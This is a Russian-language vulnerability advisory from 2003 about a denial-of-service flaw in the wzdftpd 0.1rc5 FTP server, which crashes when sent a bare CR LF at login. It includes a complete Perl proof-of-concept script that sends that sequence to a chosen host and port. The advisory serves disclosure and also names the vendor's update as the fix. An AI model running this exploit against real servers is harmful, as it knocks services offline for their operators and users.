Security Lab

Отказ в обслуживании против wzdftpd FTP сервера

Дата публикации:25.09.2003
Всего просмотров:1730
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: wzdftpd 0.1rc5

Описание: Отказ в обслуживании обнаружен в wzdftpd FTP сервере. Удаленный атакующий может аварийно завершить работу FTP сервера.

Удаленный пользователь может послать одиночную последовательность CR LF в login prompt, чтобы вызвать исключение и аварийно завершить работу FTP сервера.

Пример/Эксплоит:

#!/usr/bin/perl
 
#   ####################################
#   #     Proof of concept for         #
#   # WZDFTPD FTP Server version 0.1rc5 #
#   ####################################
 
# http://www.moozatech.com/mt-23-09-2003.txt
 
# Usage: perl mooza1.pl [host] [port]
use IO::Socket;

$host = $ARGV[0];
$port = $ARGV[1];
print "\n#####################################\n\n";
print "Proof-Of-Concept for wzdftpd v0.1rc5.\n";
print "this code is for demonstration only.\n";
print "Use it under your own responsebility.\n";
print "\n#####################################\n\n";

if (defined $host && defined $port ) {
} else {
  print "Oops, Something is missing.\n";
  die "Usage: perl mooza1.pl [host] [port]\n";
 

print "Connecting to $host:$port... ";

$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port,
 Proto => "tcp", Type=> SOCK_STREAM) or die "Failed, Cant connect?\n";
print "OK\n";
sleep 1;
print "Sending Dos..\n";
sleep 2;
print $socket "\r\n";
$socket->autoflush(1);

sleep 2;
print "we are done here..\n\n";
close($socket);

URL производителя: http://www.wzdftpd.net/

Решение: Установите обновленную версию программы с сайта производителя.

Ссылки: Moozatech: WZFTPD Denial Of Service